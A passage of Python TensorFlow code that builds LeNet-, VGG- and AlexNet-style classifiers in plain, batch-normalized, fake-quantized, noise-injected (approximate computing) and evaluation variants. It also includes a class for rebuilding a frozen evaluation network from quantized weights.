for idx in range(Q_biases.shape[0]):
fout.write(str(Q_biases[idx]) + " ")
with open('./ApproxWeights/' + name + '_activations.txt', 'w') as fout:
fout.write(str(S_acts) + "\n")
fout.write(str(Z_acts) + "\n")
else:
act_min = self._sess.run(self._quantLayers[name]['Act_Min'])
act_max = self._sess.run(self._quantLayers[name]['Act_Max'])
S_acts, Z_acts = quantAct(act_min, act_max)
S_last = S_acts
self._postActivationsMin[name] = act_min
self._postActivationsMax[name] = act_max
if layertype.find('Pooling') >= 0:
f_config.write(str(self._layerInfos[idx][0]) + " " + str(self._layerInfos[idx][1]))
f_config.write("\n")
with open('./ApproxWeights/' + name + '_activations.txt', 'w') as fout:
fout.write(str(S_acts) + "\n")
fout.write(str(Z_acts) + "\n")
f_names.close()
f_config.close()
f_debug.close()
class Net4Eval(Net4Classify):
    """Evaluation network rebuilt from a quantized, pretrained classifier.

    Takes a `pretrained` network whose `_postTrain` has populated the
    de-quantized weights/biases and activation ranges, and instantiates a
    frozen copy of the classifier for accuracy evaluation.  Training-time
    hooks (`_postInit`, `_postTrain`) are disabled.
    """
    def __init__(self, inputShape, numClasses, body, pretrained, HParam=HParamDefault, name='Net4Quant'):
        self._pretrained = pretrained
        # Copy quantization products before the base class builds the graph.
        self._preInit()
        Net4Classify.__init__(self, inputShape, numClasses, body, HParam, name)
        with self._graph.as_default():
            self._sess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])
    def _preInit(self):
        # Pull the quantization products exported by the pretrained network.
        self._preWeights = self._pretrained._postWeights
        self._preBias = self._pretrained._postBias
        self._preActivationsMin = self._pretrained._postActivationsMin
        self._preActivationsMax = self._pretrained._postActivationsMax
    def body(self, images):
        def _outWrapper(net):
            # Quantization simulation is disabled for evaluation: pass the
            # raw layer output through unchanged.
            return net.output
        # Build the body from the pre-quantized constants, then append the
        # constant-initialized logits layer.
        net, layers = self._body(self, images, self._preWeights, self._preBias,
                                 self._preActivationsMin, self._preActivationsMax)
        logits = Layer.FullyConnected(_outWrapper(net), outputSize=self._numClasses,
                                      weightInit=Layer.ConstInit(self._preWeights['FC_Logits']),
                                      wd=self._HParam['WeightDecay'],
                                      biasInit=Layer.ConstInit(self._preBias['FC_Logits']),
                                      activation=Layer.Linear,
                                      name='FC_Logits', dtype=tf.float32)
        logits.setMinMax(self._preActivationsMin['FC_Logits'], self._preActivationsMax['FC_Logits'])
        layers.append(logits)
        return logits.output, layers
    def saveMiddle(self, image):
        """Dump the input image and every layer's activations to Middle.txt."""
        np.set_printoptions(threshold=np.inf)
        # BUGFIX: the file was opened without ever being closed.
        with open('Middle.txt', 'w') as fout:
            print('Image: ', file=fout)
            print(image, file=fout)
            for layer in self._layers:
                name = layer._name
                print('Result: ', name, file=fout)
                # BUGFIX: original fed `tf._images`, which does not exist on
                # the tensorflow module (guaranteed AttributeError).  The
                # input placeholder is an instance attribute — presumably
                # created by Net4Classify; confirm against the base class.
                result = self._sess.run(layer._output, feed_dict={self._images: image})[0]
                print(result, file=fout)
    def _postInit(self):
        # No extra post-construction work for the evaluation network.
        pass
    def _postTrain(self):
        # Evaluation networks are frozen; nothing to quantize or export.
        pass
def LeNetBody(network, images):
    """LeNet-style extractor: three 5x5 conv+maxpool stages and one FC layer."""
    decay = network._HParam['WeightDecay']
    layers = []
    # Map raw uint8 pixel values into [0, 1].
    scaled = tf.identity(images / 255.0, name='images_standardized')
    feed = scaled
    for channels, tag in ((16, 'Conv1'), (32, 'Conv2'), (64, 'Conv3')):
        conv = Layer.Conv2D(feed, convChannels=channels,
                            convKernel=[5, 5], convStride=[1, 1], convWD=decay,
                            convInit=Layer.XavierInit, convPadding='SAME',
                            bias=True, biasInit=Layer.ConstInit(0.0),
                            pool=True, poolSize=[2, 2], poolStride=[2, 2],
                            poolType=Layer.MaxPool, poolPadding='SAME',
                            activation=Layer.ReLU,
                            name=tag, dtype=tf.float32)
        layers.append(conv)
        feed = conv.output
    # Collapse the spatial grid into a single feature vector per example.
    flat = tf.reshape(feed, [-1, feed.shape[1] * feed.shape[2] * feed.shape[3]])
    fc = Layer.FullyConnected(flat, outputSize=256, weightInit=Layer.XavierInit, wd=decay,
                              bias=True, biasInit=Layer.ConstInit(0.0),
                              activation=Layer.ReLU,
                              name='FC1', dtype=tf.float32)
    layers.append(fc)
    return fc.output, layers
def LeNetBNBody(network, images):
    """LeNet extractor with batch normalization in every conv and FC layer."""
    decay = network._HParam['WeightDecay']
    layers = []
    # Map raw uint8 pixel values into [0, 1].
    scaled = tf.identity(images / 255.0, name='images_standardized')
    feed = scaled
    for channels, tag in ((16, 'Conv1'), (32, 'Conv2'), (64, 'Conv3')):
        conv = Layer.Conv2D(feed, convChannels=channels,
                            convKernel=[5, 5], convStride=[1, 1], convWD=decay,
                            convInit=Layer.XavierInit, convPadding='SAME',
                            bias=True, biasInit=Layer.ConstInit(0.0),
                            bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8,
                            pool=True, poolSize=[2, 2], poolStride=[2, 2],
                            poolType=Layer.MaxPool, poolPadding='SAME',
                            activation=Layer.ReLU,
                            name=tag, dtype=tf.float32)
        layers.append(conv)
        feed = conv.output
    # Collapse the spatial grid into a single feature vector per example.
    flat = tf.reshape(feed, [-1, feed.shape[1] * feed.shape[2] * feed.shape[3]])
    fc = Layer.FullyConnected(flat, outputSize=256, weightInit=Layer.XavierInit, wd=decay,
                              bias=True, biasInit=Layer.ConstInit(0.0),
                              bn=True, step=network._step, ifTest=network._ifTest,
                              activation=Layer.ReLU,
                              name='FC1', dtype=tf.float32)
    layers.append(fc)
    return fc.output, layers
def LeNetBody_Quant(network, images, preWeights, preBias):
    """LeNet body rebuilt from pre-quantized constants with fake-quantized
    activations between layers (quantization-aware fine-tuning graph)."""
    def _fakeQuantize(layer):
        # Emulate uint8 activations by passing the layer output through TF's
        # fake-quant op over the layer's recorded [min, max] range.
        lo = layer._outMin
        hi = layer._outMax
        return fake_quant_with_min_max_vars(layer.output, lo, hi,
                                            num_bits=FAKEBITS, narrow_range=False)
    decay = network._HParam['WeightDecay']
    layers = []
    scaled = tf.identity(images * (1 / 255.0), name='images_standardized')
    feed = scaled
    for channels, tag in ((16, 'Conv1'), (32, 'Conv2'), (64, 'Conv3')):
        conv = Layer.Conv2D(feed, convChannels=channels,
                            convKernel=[5, 5], convStride=[1, 1], convWD=decay,
                            convInit=Layer.ConstInit(preWeights[tag]), convPadding='SAME',
                            biasInit=Layer.ConstInit(preBias[tag]),
                            pool=True, poolSize=[2, 2], poolStride=[2, 2],
                            poolType=Layer.MaxPool, poolPadding='SAME',
                            activation=Layer.ReLU,
                            fakeQuant=True, name=tag, dtype=tf.float32)
        layers.append(conv)
        feed = _fakeQuantize(conv)
    last = layers[-1].output
    flat = tf.reshape(feed, [-1, last.shape[1] * last.shape[2] * last.shape[3]])
    fc = Layer.FullyConnected(flat, outputSize=256,
                              weightInit=Layer.ConstInit(preWeights['FC1']), wd=decay,
                              biasInit=Layer.ConstInit(preBias['FC1']),
                              activation=Layer.ReLU,
                              fakeQuant=True, name='FC1', dtype=tf.float32)
    layers.append(fc)
    # Note: returns the layer object (not its output tensor), like the
    # other *_Quant bodies.
    return fc, layers
def LeNetBody_Approx(network, images, preWeights, preBias):
    """LeNet body from pre-quantized constants with fake-quantized activations
    plus injected multiplicative noise simulating approximate computing."""
    def _quantWithNoise(layer):
        # Fake-quantize over the layer's recorded [min, max] range ...
        out = fake_quant_with_min_max_vars(layer.output, layer._outMin, layer._outMax,
                                           num_bits=FAKEBITS, narrow_range=False)
        # ... then perturb each activation proportionally to its magnitude.
        out += PORTION * tf.abs(out) * tf.random_uniform(minval=FROM, maxval=TO, shape=out.shape)
        return out
    decay = network._HParam['WeightDecay']
    layers = []
    scaled = tf.identity(images * (1 / 255.0), name='images_standardized')
    feed = scaled
    for channels, tag in ((16, 'Conv1'), (32, 'Conv2'), (64, 'Conv3')):
        conv = Layer.Conv2D(feed, convChannels=channels,
                            convKernel=[5, 5], convStride=[1, 1], convWD=decay,
                            convInit=Layer.ConstInit(preWeights[tag]), convPadding='SAME',
                            biasInit=Layer.ConstInit(preBias[tag]),
                            pool=True, poolSize=[2, 2], poolStride=[2, 2],
                            poolType=Layer.MaxPool, poolPadding='SAME',
                            activation=Layer.ReLU,
                            fakeQuant=True, name=tag, dtype=tf.float32)
        layers.append(conv)
        feed = _quantWithNoise(conv)
    last = layers[-1].output
    flat = tf.reshape(feed, [-1, last.shape[1] * last.shape[2] * last.shape[3]])
    fc = Layer.FullyConnected(flat, outputSize=256,
                              weightInit=Layer.ConstInit(preWeights['FC1']), wd=decay,
                              biasInit=Layer.ConstInit(preBias['FC1']),
                              activation=Layer.ReLU,
                              fakeQuant=True, name='FC1', dtype=tf.float32)
    layers.append(fc)
    return fc, layers
def LeNetBody_Eval(network, images, preWeights, preBias, preMin, preMax):
    """Rebuild the LeNet body from constant (de-quantized) parameters and the
    recorded activation ranges, with no quantization simulation (pure eval)."""
    def _passthrough(layer):
        # Quantization/noise simulation disabled: forward the raw output.
        return layer.output
    decay = network._HParam['WeightDecay']
    layers = []
    scaled = tf.identity(images * (1 / 255.0), name='images_standardized')
    feed = scaled
    for channels, tag in ((16, 'Conv1'), (32, 'Conv2'), (64, 'Conv3')):
        conv = Layer.Conv2D(feed, convChannels=channels,
                            convKernel=[5, 5], convStride=[1, 1], convWD=decay,
                            convInit=Layer.ConstInit(preWeights[tag]), convPadding='SAME',
                            biasInit=Layer.ConstInit(preBias[tag]),
                            pool=True, poolSize=[2, 2], poolStride=[2, 2],
                            poolType=Layer.MaxPool, poolPadding='SAME',
                            activation=Layer.ReLU,
                            name=tag, dtype=tf.float32)
        # Restore the activation range observed during training.
        conv.setMinMax(preMin[tag], preMax[tag])
        layers.append(conv)
        feed = _passthrough(conv)
    last = layers[-1].output
    flat = tf.reshape(feed, [-1, last.shape[1] * last.shape[2] * last.shape[3]])
    fc = Layer.FullyConnected(flat, outputSize=256,
                              weightInit=Layer.ConstInit(preWeights['FC1']), wd=decay,
                              biasInit=Layer.ConstInit(preBias['FC1']),
                              activation=Layer.ReLU,
                              name='FC1', dtype=tf.float32)
    fc.setMinMax(preMin['FC1'], preMax['FC1'])
    layers.append(fc)
    return fc, layers
def LeNetBigBody(network, images):
    """Wider LeNet extractor: three 5x5 conv+maxpool stages (32/64/128
    channels) and one 512-unit FC layer."""
    decay = network._HParam['WeightDecay']
    layers = []
    # Map raw uint8 pixel values into [0, 1].
    scaled = tf.identity(images / 255.0, name='images_standardized')
    feed = scaled
    for channels, tag in ((32, 'Conv1'), (64, 'Conv2'), (128, 'Conv3')):
        conv = Layer.Conv2D(feed, convChannels=channels,
                            convKernel=[5, 5], convStride=[1, 1], convWD=decay,
                            convInit=Layer.XavierInit, convPadding='SAME',
                            bias=True, biasInit=Layer.ConstInit(0.0),
                            pool=True, poolSize=[2, 2], poolStride=[2, 2],
                            poolType=Layer.MaxPool, poolPadding='SAME',
                            activation=Layer.ReLU,
                            name=tag, dtype=tf.float32)
        layers.append(conv)
        feed = conv.output
    flat = tf.reshape(feed, [-1, feed.shape[1] * feed.shape[2] * feed.shape[3]])
    fc = Layer.FullyConnected(flat, outputSize=512, weightInit=Layer.XavierInit, wd=decay,
                              bias=True, biasInit=Layer.ConstInit(0.0),
                              activation=Layer.ReLU,
                              name='FC1', dtype=tf.float32)
    layers.append(fc)
    return fc.output, layers
def LeNetBigBNBody(network, images):
    """Wider LeNet extractor (32/64/128 channels, 512-unit FC) with batch
    normalization in every layer."""
    decay = network._HParam['WeightDecay']
    layers = []
    # Map raw uint8 pixel values into [0, 1].
    scaled = tf.identity(images / 255.0, name='images_standardized')
    feed = scaled
    for channels, tag in ((32, 'Conv1'), (64, 'Conv2'), (128, 'Conv3')):
        conv = Layer.Conv2D(feed, convChannels=channels,
                            convKernel=[5, 5], convStride=[1, 1], convWD=decay,
                            convInit=Layer.XavierInit, convPadding='SAME',
                            bias=True, biasInit=Layer.ConstInit(0.0),
                            bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8,
                            pool=True, poolSize=[2, 2], poolStride=[2, 2],
                            poolType=Layer.MaxPool, poolPadding='SAME',
                            activation=Layer.ReLU,
                            name=tag, dtype=tf.float32)
        layers.append(conv)
        feed = conv.output
    flat = tf.reshape(feed, [-1, feed.shape[1] * feed.shape[2] * feed.shape[3]])
    fc = Layer.FullyConnected(flat, outputSize=512, weightInit=Layer.XavierInit, wd=decay,
                              bias=True, biasInit=Layer.ConstInit(0.0),
                              bn=True, step=network._step, ifTest=network._ifTest,
                              activation=Layer.ReLU,
                              name='FC1', dtype=tf.float32)
    layers.append(fc)
    return fc.output, layers
def LeNetBigBody_Quant(network, images, preWeights, preBias):
    """Wider LeNet body rebuilt from pre-quantized constants with
    fake-quantized activations between layers."""
    def _fakeQuantize(layer):
        # Emulate uint8 activations with TF's fake-quant op over the
        # layer's recorded [min, max] range.
        lo = layer._outMin
        hi = layer._outMax
        return fake_quant_with_min_max_vars(layer.output, lo, hi,
                                            num_bits=FAKEBITS, narrow_range=False)
    decay = network._HParam['WeightDecay']
    layers = []
    scaled = tf.identity(images * (1 / 255.0), name='images_standardized')
    feed = scaled
    for channels, tag in ((32, 'Conv1'), (64, 'Conv2'), (128, 'Conv3')):
        conv = Layer.Conv2D(feed, convChannels=channels,
                            convKernel=[5, 5], convStride=[1, 1], convWD=decay,
                            convInit=Layer.ConstInit(preWeights[tag]), convPadding='SAME',
                            biasInit=Layer.ConstInit(preBias[tag]),
                            pool=True, poolSize=[2, 2], poolStride=[2, 2],
                            poolType=Layer.MaxPool, poolPadding='SAME',
                            activation=Layer.ReLU,
                            fakeQuant=True, name=tag, dtype=tf.float32)
        layers.append(conv)
        feed = _fakeQuantize(conv)
    last = layers[-1].output
    flat = tf.reshape(feed, [-1, last.shape[1] * last.shape[2] * last.shape[3]])
    fc = Layer.FullyConnected(flat, outputSize=512,
                              weightInit=Layer.ConstInit(preWeights['FC1']), wd=decay,
                              biasInit=Layer.ConstInit(preBias['FC1']),
                              activation=Layer.ReLU,
                              fakeQuant=True, name='FC1', dtype=tf.float32)
    layers.append(fc)
    return fc, layers
def LeNetBigBody_Approx(network, images, preWeights, preBias):
    """Wider LeNet body from pre-quantized constants with fake-quantized
    activations plus injected noise simulating approximate computing."""
    def _quantWithNoise(layer):
        # Fake-quantize over the layer's recorded [min, max] range ...
        out = fake_quant_with_min_max_vars(layer.output, layer._outMin, layer._outMax,
                                           num_bits=FAKEBITS, narrow_range=False)
        # ... then perturb each activation proportionally to its magnitude.
        out += PORTION * tf.abs(out) * tf.random_uniform(minval=FROM, maxval=TO, shape=out.shape)
        return out
    decay = network._HParam['WeightDecay']
    layers = []
    scaled = tf.identity(images * (1 / 255.0), name='images_standardized')
    feed = scaled
    for channels, tag in ((32, 'Conv1'), (64, 'Conv2'), (128, 'Conv3')):
        conv = Layer.Conv2D(feed, convChannels=channels,
                            convKernel=[5, 5], convStride=[1, 1], convWD=decay,
                            convInit=Layer.ConstInit(preWeights[tag]), convPadding='SAME',
                            biasInit=Layer.ConstInit(preBias[tag]),
                            pool=True, poolSize=[2, 2], poolStride=[2, 2],
                            poolType=Layer.MaxPool, poolPadding='SAME',
                            activation=Layer.ReLU,
                            fakeQuant=True, name=tag, dtype=tf.float32)
        layers.append(conv)
        feed = _quantWithNoise(conv)
    last = layers[-1].output
    flat = tf.reshape(feed, [-1, last.shape[1] * last.shape[2] * last.shape[3]])
    fc = Layer.FullyConnected(flat, outputSize=512,
                              weightInit=Layer.ConstInit(preWeights['FC1']), wd=decay,
                              biasInit=Layer.ConstInit(preBias['FC1']),
                              activation=Layer.ReLU,
                              fakeQuant=True, name='FC1', dtype=tf.float32)
    layers.append(fc)
    return fc, layers
def LeNetBigBody_Eval(network, images, preWeights, preBias, preMin, preMax):
    """Rebuild the wider LeNet body from constant (de-quantized) parameters
    and recorded activation ranges, with no quantization simulation."""
    def _passthrough(layer):
        # Quantization/noise simulation disabled: forward the raw output.
        return layer.output
    decay = network._HParam['WeightDecay']
    layers = []
    scaled = tf.identity(images * (1 / 255.0), name='images_standardized')
    feed = scaled
    for channels, tag in ((32, 'Conv1'), (64, 'Conv2'), (128, 'Conv3')):
        conv = Layer.Conv2D(feed, convChannels=channels,
                            convKernel=[5, 5], convStride=[1, 1], convWD=decay,
                            convInit=Layer.ConstInit(preWeights[tag]), convPadding='SAME',
                            biasInit=Layer.ConstInit(preBias[tag]),
                            pool=True, poolSize=[2, 2], poolStride=[2, 2],
                            poolType=Layer.MaxPool, poolPadding='SAME',
                            activation=Layer.ReLU,
                            name=tag, dtype=tf.float32)
        # Restore the activation range observed during training.
        conv.setMinMax(preMin[tag], preMax[tag])
        layers.append(conv)
        feed = _passthrough(conv)
    last = layers[-1].output
    flat = tf.reshape(feed, [-1, last.shape[1] * last.shape[2] * last.shape[3]])
    fc = Layer.FullyConnected(flat, outputSize=512,
                              weightInit=Layer.ConstInit(preWeights['FC1']), wd=decay,
                              biasInit=Layer.ConstInit(preBias['FC1']),
                              activation=Layer.ReLU,
                              name='FC1', dtype=tf.float32)
    fc.setMinMax(preMin['FC1'], preMax['FC1'])
    layers.append(fc)
    return fc, layers
def LargeNetBody(network, images):
    """VGG-style body: three pairs of 3x3 convs (max-pooling after the second
    conv of each pair) followed by a 512-unit FC layer."""
    decay = network._HParam['WeightDecay']
    layers = []
    # Map raw uint8 pixel values into [0, 1].
    scaled = tf.identity(images / 255.0, name='images_standardized')
    feed = scaled
    plan = ((32, 'Conv1a', False), (32, 'Conv1b', True),
            (64, 'Conv2a', False), (64, 'Conv2b', True),
            (128, 'Conv3a', False), (128, 'Conv3b', True))
    for channels, tag, pooled in plan:
        opts = dict(convChannels=channels,
                    convKernel=[3, 3], convStride=[1, 1], convWD=decay,
                    convInit=Layer.XavierInit, convPadding='SAME',
                    bias=True, biasInit=Layer.ConstInit(0.0),
                    activation=Layer.ReLU,
                    name=tag, dtype=tf.float32)
        if pooled:
            # Downsample only after the second conv of each pair; the
            # pooling kwargs are omitted entirely otherwise.
            opts.update(pool=True, poolSize=[2, 2], poolStride=[2, 2],
                        poolType=Layer.MaxPool, poolPadding='SAME')
        conv = Layer.Conv2D(feed, **opts)
        layers.append(conv)
        feed = conv.output
    flat = tf.reshape(feed, [-1, feed.shape[1] * feed.shape[2] * feed.shape[3]])
    fc = Layer.FullyConnected(flat, outputSize=512, weightInit=Layer.XavierInit, wd=decay,
                              bias=True, biasInit=Layer.ConstInit(0.0),
                              activation=Layer.ReLU,
                              name='FC1', dtype=tf.float32)
    layers.append(fc)
    return fc.output, layers
def LargeNetBody_Quant(network, images, preWeights, preBias):
    """Build the LargeNet tower with fake-quantized activations between layers.

    Each conv/FC layer is initialized from pretrained parameters; every layer's
    output is passed through a fake-quantization op (FAKEBITS bits) before it
    feeds the next layer, simulating quantized inference.

    Args:
        network: owning network; supplies the 'WeightDecay' hyperparameter.
        images: image batch with values in [0, 255].
        preWeights: dict, layer name -> pretrained kernel/weight tensor.
        preBias: dict, layer name -> pretrained bias tensor.

    Returns:
        (net, layers): the final FC layer object and the list of all layers
        in construction order.
    """
    def _quantized(layer):
        # Simulate quantized activations using the layer's recorded output range.
        return fake_quant_with_min_max_vars(layer.output, layer._outMin, layer._outMax,
                                            num_bits=FAKEBITS, narrow_range=False)

    wd = network._HParam['WeightDecay']
    layers = []
    data = tf.identity(images * (1 / 255.0), name='images_standardized')
    # (layer name, output channels, whether a 2x2 max-pool follows the conv)
    conv_plan = [('Conv1a', 32, False), ('Conv1b', 32, True),
                 ('Conv2a', 64, False), ('Conv2b', 64, True),
                 ('Conv3a', 128, False), ('Conv3b', 128, True)]
    for name, channels, pooled in conv_plan:
        kwargs = dict(convChannels=channels,
                      convKernel=[3, 3], convStride=[1, 1], convWD=wd,
                      convInit=Layer.ConstInit(preWeights[name]), convPadding='SAME',
                      biasInit=Layer.ConstInit(preBias[name]),
                      activation=Layer.ReLU,
                      fakeQuant=True, name=name, dtype=tf.float32)
        if pooled:
            kwargs.update(pool=True, poolSize=[2, 2], poolStride=[2, 2],
                          poolType=Layer.MaxPool, poolPadding='SAME')
        net = Layer.Conv2D(data, **kwargs)
        layers.append(net)
        data = _quantized(net)
    shape = net.output.shape
    flattened = tf.reshape(data, [-1, shape[1] * shape[2] * shape[3]])
    net = Layer.FullyConnected(flattened, outputSize=512,
                               weightInit=Layer.ConstInit(preWeights['FC1']), wd=wd,
                               biasInit=Layer.ConstInit(preBias['FC1']),
                               activation=Layer.ReLU,
                               fakeQuant=True, name='FC1', dtype=tf.float32)
    layers.append(net)
    return net, layers
def LargeNetBody_Eval(network, images, preWeights, preBias, preMin, preMax):
    """Build the LargeNet tower for evaluation with recorded activation ranges.

    Layers are initialized from pretrained parameters and each layer has its
    (min, max) output range restored via setMinMax; activations flow between
    layers unmodified (the fake-quantization step is disabled here).

    Args:
        network: owning network; supplies the 'WeightDecay' hyperparameter.
        images: image batch with values in [0, 255].
        preWeights: dict, layer name -> pretrained kernel/weight tensor.
        preBias: dict, layer name -> pretrained bias tensor.
        preMin: dict, layer name -> recorded output minimum.
        preMax: dict, layer name -> recorded output maximum.

    Returns:
        (net, layers): the final FC layer object and the list of all layers
        in construction order.
    """
    wd = network._HParam['WeightDecay']
    layers = []
    data = tf.identity(images * (1 / 255.0), name='images_standardized')
    # (layer name, output channels, whether a 2x2 max-pool follows the conv)
    conv_plan = [('Conv1a', 32, False), ('Conv1b', 32, True),
                 ('Conv2a', 64, False), ('Conv2b', 64, True),
                 ('Conv3a', 128, False), ('Conv3b', 128, True)]
    for name, channels, pooled in conv_plan:
        kwargs = dict(convChannels=channels,
                      convKernel=[3, 3], convStride=[1, 1], convWD=wd,
                      convInit=Layer.ConstInit(preWeights[name]), convPadding='SAME',
                      biasInit=Layer.ConstInit(preBias[name]),
                      activation=Layer.ReLU,
                      name=name, dtype=tf.float32)
        if pooled:
            kwargs.update(pool=True, poolSize=[2, 2], poolStride=[2, 2],
                          poolType=Layer.MaxPool, poolPadding='SAME')
        net = Layer.Conv2D(data, **kwargs)
        net.setMinMax(preMin[name], preMax[name])
        layers.append(net)
        data = net.output
    shape = net.output.shape
    flattened = tf.reshape(data, [-1, shape[1] * shape[2] * shape[3]])
    net = Layer.FullyConnected(flattened, outputSize=512,
                               weightInit=Layer.ConstInit(preWeights['FC1']), wd=wd,
                               biasInit=Layer.ConstInit(preBias['FC1']),
                               activation=Layer.ReLU,
                               name='FC1', dtype=tf.float32)
    net.setMinMax(preMin['FC1'], preMax['FC1'])
    layers.append(net)
    return net, layers
def AlexNetBody(network, images):
    """Build the AlexNet-style feature extractor (no batch norm).

    Eight 3x3 convolutions (max-pooled after Conv2b/Conv3b/Conv4b) followed by
    two 4096-unit fully connected layers, all Xavier-initialized with ReLU.

    Args:
        network: owning network; supplies the 'WeightDecay' hyperparameter.
        images: image batch with values in [0, 255].

    Returns:
        (output, layers): the final FC output tensor and the list of all
        layer objects in construction order.
    """
    wd = network._HParam['WeightDecay']
    layers = []
    data = tf.identity(images / 255.0, name='images_standardized')
    # (layer name, output channels, whether a 2x2 max-pool follows the conv)
    conv_plan = [('Conv1a', 96, False), ('Conv1b', 96, False),
                 ('Conv2a', 256, False), ('Conv2b', 256, True),
                 ('Conv3a', 384, False), ('Conv3b', 384, True),
                 ('Conv4a', 256, False), ('Conv4b', 256, True)]
    for name, channels, pooled in conv_plan:
        kwargs = dict(convChannels=channels,
                      convKernel=[3, 3], convStride=[1, 1], convWD=wd,
                      convInit=Layer.XavierInit, convPadding='SAME',
                      bias=True, biasInit=Layer.ConstInit(0.0),
                      activation=Layer.ReLU,
                      name=name, dtype=tf.float32)
        if pooled:
            kwargs.update(pool=True, poolSize=[2, 2], poolStride=[2, 2],
                          poolType=Layer.MaxPool, poolPadding='SAME')
        net = Layer.Conv2D(data, **kwargs)
        layers.append(net)
        data = net.output
    shape = net.output.shape
    flattened = tf.reshape(data, [-1, shape[1] * shape[2] * shape[3]])
    data = flattened
    for name in ('FC1', 'FC2'):
        net = Layer.FullyConnected(data, outputSize=4096,
                                   weightInit=Layer.XavierInit, wd=wd,
                                   bias=True, biasInit=Layer.ConstInit(0.0),
                                   activation=Layer.ReLU,
                                   name=name, dtype=tf.float32)
        layers.append(net)
        data = net.output
    return net.output, layers
def AlexNetBNBody(network, images):
    """Build the AlexNet-style feature extractor with batch normalization.

    Identical topology to AlexNetBody, but every conv and FC layer enables
    batch norm driven by the network's global step and train/test switch.

    Args:
        network: owning network; supplies 'WeightDecay', _step and _ifTest.
        images: image batch with values in [0, 255].

    Returns:
        (output, layers): the final FC output tensor and the list of all
        layer objects in construction order.
    """
    wd = network._HParam['WeightDecay']
    layers = []
    data = tf.identity(images / 255.0, name='images_standardized')
    # (layer name, output channels, whether a 2x2 max-pool follows the conv)
    conv_plan = [('Conv1a', 96, False), ('Conv1b', 96, False),
                 ('Conv2a', 256, False), ('Conv2b', 256, True),
                 ('Conv3a', 384, False), ('Conv3b', 384, True),
                 ('Conv4a', 256, False), ('Conv4b', 256, True)]
    for name, channels, pooled in conv_plan:
        kwargs = dict(convChannels=channels,
                      convKernel=[3, 3], convStride=[1, 1], convWD=wd,
                      convInit=Layer.XavierInit, convPadding='SAME',
                      bias=True, biasInit=Layer.ConstInit(0.0),
                      bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8,
                      activation=Layer.ReLU,
                      name=name, dtype=tf.float32)
        if pooled:
            kwargs.update(pool=True, poolSize=[2, 2], poolStride=[2, 2],
                          poolType=Layer.MaxPool, poolPadding='SAME')
        net = Layer.Conv2D(data, **kwargs)
        layers.append(net)
        data = net.output
    shape = net.output.shape
    flattened = tf.reshape(data, [-1, shape[1] * shape[2] * shape[3]])
    data = flattened
    for name in ('FC1', 'FC2'):
        net = Layer.FullyConnected(data, outputSize=4096,
                                   weightInit=Layer.XavierInit, wd=wd,
                                   bias=True, biasInit=Layer.ConstInit(0.0),
                                   bn=True, step=network._step, ifTest=network._ifTest,
                                   activation=Layer.ReLU,
                                   name=name, dtype=tf.float32)
        layers.append(net)
        data = net.output
    return net.output, layers
def AlexNetBody_Quant(network, images, preWeights, preBias):
    """Build the AlexNet tower with fake-quantized activations between layers.

    Each conv/FC layer is initialized from pretrained parameters; every layer's
    output is passed through a fake-quantization op (FAKEBITS bits) before it
    feeds the next layer, simulating quantized inference.

    Args:
        network: owning network; supplies the 'WeightDecay' hyperparameter.
        images: image batch with values in [0, 255].
        preWeights: dict, layer name -> pretrained kernel/weight tensor.
        preBias: dict, layer name -> pretrained bias tensor.

    Returns:
        (net, layers): the final FC layer object and the list of all layers
        in construction order.
    """
    def _quantized(layer):
        # Simulate quantized activations using the layer's recorded output range.
        return fake_quant_with_min_max_vars(layer.output, layer._outMin, layer._outMax,
                                            num_bits=FAKEBITS, narrow_range=False)

    wd = network._HParam['WeightDecay']
    layers = []
    data = tf.identity(images * (1 / 255.0), name='images_standardized')
    # (layer name, output channels, whether a 2x2 max-pool follows the conv)
    conv_plan = [('Conv1a', 96, False), ('Conv1b', 96, False),
                 ('Conv2a', 256, False), ('Conv2b', 256, True),
                 ('Conv3a', 384, False), ('Conv3b', 384, True),
                 ('Conv4a', 256, False), ('Conv4b', 256, True)]
    for name, channels, pooled in conv_plan:
        kwargs = dict(convChannels=channels,
                      convKernel=[3, 3], convStride=[1, 1], convWD=wd,
                      convInit=Layer.ConstInit(preWeights[name]), convPadding='SAME',
                      biasInit=Layer.ConstInit(preBias[name]),
                      activation=Layer.ReLU,
                      fakeQuant=True, name=name, dtype=tf.float32)
        if pooled:
            kwargs.update(pool=True, poolSize=[2, 2], poolStride=[2, 2],
                          poolType=Layer.MaxPool, poolPadding='SAME')
        net = Layer.Conv2D(data, **kwargs)
        layers.append(net)
        data = _quantized(net)
    shape = net.output.shape
    flattened = tf.reshape(data, [-1, shape[1] * shape[2] * shape[3]])
    data = flattened
    for name in ('FC1', 'FC2'):
        net = Layer.FullyConnected(data, outputSize=4096,
                                   weightInit=Layer.ConstInit(preWeights[name]), wd=wd,
                                   biasInit=Layer.ConstInit(preBias[name]),
                                   activation=Layer.ReLU,
                                   fakeQuant=True, name=name, dtype=tf.float32)
        layers.append(net)
        data = _quantized(net)
    return net, layers
def AlexNetBody_Approx(network, images, preWeights, preBias):
    """Build the AlexNet tower simulating quantized + approximate computing.

    Like AlexNetBody_Quant, but after fake-quantizing each layer's output a
    multiplicative uniform-noise term (scaled by PORTION, drawn from
    [FROM, TO)) is added to emulate value degradation of approximate hardware.

    Args:
        network: owning network; supplies the 'WeightDecay' hyperparameter.
        images: image batch with values in [0, 255].
        preWeights: dict, layer name -> pretrained kernel/weight tensor.
        preBias: dict, layer name -> pretrained bias tensor.

    Returns:
        (net, layers): the final FC layer object and the list of all layers
        in construction order.
    """
    def _degraded(layer):
        # Fake-quantize the activations, then inject proportional random noise
        # to simulate approximate-computing error.
        out = fake_quant_with_min_max_vars(layer.output, layer._outMin, layer._outMax,
                                           num_bits=FAKEBITS, narrow_range=False)
        return out + PORTION * tf.abs(out) * tf.random_uniform(minval=FROM, maxval=TO,
                                                               shape=out.shape)

    wd = network._HParam['WeightDecay']
    layers = []
    data = tf.identity(images * (1 / 255.0), name='images_standardized')
    # (layer name, output channels, whether a 2x2 max-pool follows the conv)
    conv_plan = [('Conv1a', 96, False), ('Conv1b', 96, False),
                 ('Conv2a', 256, False), ('Conv2b', 256, True),
                 ('Conv3a', 384, False), ('Conv3b', 384, True),
                 ('Conv4a', 256, False), ('Conv4b', 256, True)]
    for name, channels, pooled in conv_plan:
        kwargs = dict(convChannels=channels,
                      convKernel=[3, 3], convStride=[1, 1], convWD=wd,
